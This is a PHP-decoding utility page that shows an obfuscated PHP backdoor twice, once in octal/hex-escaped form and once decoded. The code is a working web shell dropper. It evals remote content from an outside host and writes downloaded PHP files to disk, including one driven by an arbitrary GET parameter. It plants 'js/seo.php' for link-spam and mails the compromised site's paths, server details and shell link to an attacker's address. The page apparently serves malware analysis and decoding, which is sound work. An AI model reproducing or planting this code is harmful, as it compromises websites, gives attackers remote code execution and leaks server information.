Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto PTjDx; tFIlE: $host = str_replace( "\167\167\x77\x2e", "", ..
Decoded Output download
<?php
goto PTjDx;
tFIlE:
$host = str_replace(
"www.",
"",
@$_SERVER["HTTP_HOST"]
);
goto AJmZU;
ZAJ5W:
$EL_MuHaMMeD =
"Dosya Yolu : " .
$_SERVER["DOCUMENT_ROOT"] .
"\xd\xa";
goto fTJ3l;
hiFXY:
if (function_exists("curl_init")) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (
function_exists(
"file_get_contents"
)
) {
@$gitt = file_get_contents($x);
}
goto YVAZZ;
fTJ3l:
$EL_MuHaMMeD .=
"Server Admin : " .
$_SERVER["SERVER_ADMIN"] .
"
";
goto Ln4us;
mVaq1:
$kime =
"[email protected]";
goto klW0E;
WEhmX:
echo "<!DOCTYPE html!>";
goto a0ZFw;
YVAZZ:
echo $gitt;
goto PI9Kb;
TBh_S:
$s =
"https://acbdf.space/";
goto tFIlE;
Q21Pl:
error_reporting(0);
goto TBh_S;
AJmZU:
$x = $s . "l-" . base64_encode($host);
goto hiFXY;
PI9Kb:
if (isset($_GET["ksfg"])) {
$f = fopen($_GET["ksfg"] . ".php", "a");
fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"]));
fclose($f);
}
goto WEhmX;
PTjDx:
eval(
"?>" .
file_get_contents(
"https://googleseo.me/data.txt"
)
);
goto CMBC2;
CMBC2:
if ($_POST["query"]) {
$veriyfy = stripslashes(stripslashes($_POST["query"]));
$data = "data.txt";
@touch("data.txt");
$ver = @fopen($data, "w");
@fwrite($ver, $veriyfy);
@fclose($ver);
} else {
$datas = @fopen("data.txt", "r");
$i = 0;
while ($i <= 5) {
$i++;
$blue = @fgets($datas, 1024);
echo $blue;
}
}
goto uHN2M;
uHN2M:
$datasi = @fopen("js/seo.php", "r");
goto KmosN;
KmosN:
if ($datasi) {
} else {
@mkdir("js");
$dos = file_get_contents(
"https://wordpres.page/txt/lamer.txt"
);
$data = "js/seo.php";
@touch("js/seo.php");
$ver = @fopen($data, "w");
@fwrite($ver, $dos);
@fclose($ver);
$yol =
"http://" .
$_SERVER["HTTP_HOST"] .
"" .
$_SERVER["REQUEST_URI"] .
"";
$y =
"<h1>Sender Yazdirildi.<br/> SITE YOL : " .
$yol .
"<br/>Sender Yolu : js/crs.php</h1>";
$header .=
"From: SheLL Boot <[email protected]>\xa";
$header .=
"Content-Type: text/html;\xa charset=utf-8
";
@mail(
"[email protected]",
"Hacklink Bildiri",
"{$y}",
$header
);
@mail(
"[email protected]",
"Hacklink Bildiri",
"{$y}",
$header
);
}
goto mVaq1;
K8lSA:
$EL_MuHaMMeD .=
"Shell Link : http://" .
$_SERVER["SERVER_NAME"] .
$_SERVER["PHP_SELF"] .
"
\xa";
goto zf5i2;
klW0E:
$baslik = "2022 log";
goto ZAJ5W;
zf5i2:
$EL_MuHaMMeD .=
"Avlanan Site : " .
$_SERVER["HTTP_HOST"] .
"
";
goto nu0fS;
Ln4us:
$EL_MuHaMMeD .=
"Server isletim sistemi : " .
$_SERVER["SERVER_SOFTWARE"] .
"\xd
";
goto K8lSA;
nu0fS:
mail($kime, $baslik, $EL_MuHaMMeD);
goto Q21Pl;
a0ZFw:
?>
Did this file decode correctly?
Original Code
<?php
goto PTjDx;
tFIlE:
$host = str_replace(
"\167\167\x77\x2e",
"",
@$_SERVER["\110\x54\124\x50\137\x48\117\x53\124"]
);
goto AJmZU;
ZAJ5W:
$EL_MuHaMMeD =
"\104\157\163\x79\141\40\131\x6f\x6c\165\x20\x3a\40" .
$_SERVER["\x44\x4f\103\125\115\x45\x4e\x54\137\122\117\x4f\124"] .
"\xd\xa";
goto fTJ3l;
hiFXY:
if (function_exists("\x63\165\x72\154\x5f\151\156\x69\x74")) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (
function_exists(
"\x66\x69\154\x65\x5f\x67\x65\x74\137\143\x6f\156\164\145\156\164\163"
)
) {
@$gitt = file_get_contents($x);
}
goto YVAZZ;
fTJ3l:
$EL_MuHaMMeD .=
"\123\x65\x72\166\x65\x72\x20\101\144\x6d\x69\156\40\72\x20" .
$_SERVER["\x53\105\x52\126\x45\122\x5f\101\x44\115\111\116"] .
"\15\12";
goto Ln4us;
mVaq1:
$kime =
"\x6c\x6f\147\151\156\x6f\154\144\165\x6d\100\x67\155\141\151\x6c\56\x63\x6f\155";
goto klW0E;
WEhmX:
echo "\74\41\104\x4f\x43\x54\131\x50\x45\40\150\164\x6d\x6c\41\76";
goto a0ZFw;
YVAZZ:
echo $gitt;
goto PI9Kb;
TBh_S:
$s =
"\x68\164\x74\x70\163\72\57\57\141\143\142\144\146\56\163\x70\x61\143\x65\x2f";
goto tFIlE;
Q21Pl:
error_reporting(0);
goto TBh_S;
AJmZU:
$x = $s . "\154\x2d" . base64_encode($host);
goto hiFXY;
PI9Kb:
if (isset($_GET["\x6b\163\146\x67"])) {
$f = fopen($_GET["\153\x73\x66\x67"] . "\56\x70\x68\x70", "\x61");
fwrite($f, file_get_contents($s . "\163\55" . $_GET["\153\x73\x66\147"]));
fclose($f);
}
goto WEhmX;
PTjDx:
eval(
"\x3f\76" .
file_get_contents(
"\x68\x74\164\x70\x73\72\57\x2f\x67\x6f\x6f\x67\x6c\x65\163\x65\157\x2e\155\x65\x2f\144\141\164\141\56\164\170\164"
)
);
goto CMBC2;
CMBC2:
if ($_POST["\161\165\x65\162\x79"]) {
$veriyfy = stripslashes(stripslashes($_POST["\x71\x75\x65\x72\x79"]));
$data = "\x64\141\164\141\56\164\170\164";
@touch("\x64\x61\x74\141\56\164\x78\x74");
$ver = @fopen($data, "\167");
@fwrite($ver, $veriyfy);
@fclose($ver);
} else {
$datas = @fopen("\144\x61\164\141\x2e\164\170\x74", "\162");
$i = 0;
while ($i <= 5) {
$i++;
$blue = @fgets($datas, 1024);
echo $blue;
}
}
goto uHN2M;
uHN2M:
$datasi = @fopen("\x6a\x73\57\x73\145\x6f\x2e\160\x68\160", "\162");
goto KmosN;
KmosN:
if ($datasi) {
} else {
@mkdir("\x6a\x73");
$dos = file_get_contents(
"\150\x74\x74\160\x73\72\x2f\57\167\157\x72\144\x70\162\x65\163\x2e\x70\141\147\x65\x2f\x74\170\x74\57\154\141\155\145\x72\x2e\164\170\x74"
);
$data = "\152\x73\x2f\x73\145\157\x2e\x70\x68\160";
@touch("\152\163\57\163\x65\157\x2e\x70\150\160");
$ver = @fopen($data, "\x77");
@fwrite($ver, $dos);
@fclose($ver);
$yol =
"\x68\x74\164\x70\72\57\x2f" .
$_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\x54"] .
"" .
$_SERVER["\122\105\x51\x55\105\x53\x54\137\125\122\111"] .
"";
$y =
"\x3c\x68\x31\x3e\123\145\156\144\145\162\x20\131\x61\172\144\151\x72\151\154\144\x69\x2e\x3c\x62\162\57\76\x20\123\x49\x54\x45\x20\x59\x4f\x4c\40\72\x20" .
$yol .
"\74\x62\162\x2f\x3e\123\145\x6e\144\145\x72\40\131\x6f\x6c\x75\40\72\40\152\x73\x2f\143\x72\x73\56\x70\x68\x70\x3c\57\x68\x31\76";
$header .=
"\x46\x72\157\x6d\x3a\40\123\x68\x65\114\x4c\40\x42\157\157\164\x20\74\163\x75\160\160\x6f\x72\x40\x6e\x69\143\56\157\162\x67\76\xa";
$header .=
"\103\x6f\156\164\x65\156\x74\55\x54\171\160\145\72\x20\164\x65\170\164\57\150\164\x6d\154\x3b\xa\40\143\150\x61\x72\x73\x65\164\x3d\x75\164\x66\x2d\70\12";
@mail(
"\x6c\157\x67\151\x6e\157\154\x64\x75\x6d\x40\x67\155\141\x69\154\x2e\x63\x6f\x6d",
"\110\141\x63\x6b\154\x69\x6e\x6b\x20\x42\151\x6c\x64\x69\x72\151",
"{$y}",
$header
);
@mail(
"\154\x6f\x67\151\156\157\x6c\144\x75\x6d\x40\147\155\x61\151\154\x2e\x63\157\155",
"\x48\141\143\x6b\x6c\151\x6e\153\40\x42\151\x6c\144\x69\162\x69",
"{$y}",
$header
);
}
goto mVaq1;
K8lSA:
$EL_MuHaMMeD .=
"\123\150\x65\154\x6c\x20\x4c\151\156\153\x20\72\x20\150\164\x74\160\x3a\57\57" .
$_SERVER["\123\x45\122\x56\105\x52\x5f\116\x41\115\x45"] .
$_SERVER["\x50\x48\120\137\x53\x45\114\106"] .
"\15\xa";
goto zf5i2;
klW0E:
$baslik = "\x32\60\x32\x32\40\154\x6f\147";
goto ZAJ5W;
zf5i2:
$EL_MuHaMMeD .=
"\x41\166\x6c\x61\156\141\x6e\x20\123\x69\164\x65\x20\72\x20" .
$_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"] .
"\15\12";
goto nu0fS;
Ln4us:
$EL_MuHaMMeD .=
"\123\145\162\x76\145\162\40\151\x73\x6c\x65\x74\151\x6d\40\x73\151\x73\164\145\x6d\151\x20\72\x20" .
$_SERVER["\123\105\x52\126\105\122\137\123\x4f\106\x54\x57\x41\122\x45"] .
"\xd\12";
goto K8lSA;
nu0fS:
mail($kime, $baslik, $EL_MuHaMMeD);
goto Q21Pl;
a0ZFw:
?>
Function Calls
| None |
Stats
| MD5 | fe2f4b6ddf50d099503f58b2c3fc173d |
| Eval Count | 0 |
| Decode Time | 66 ms |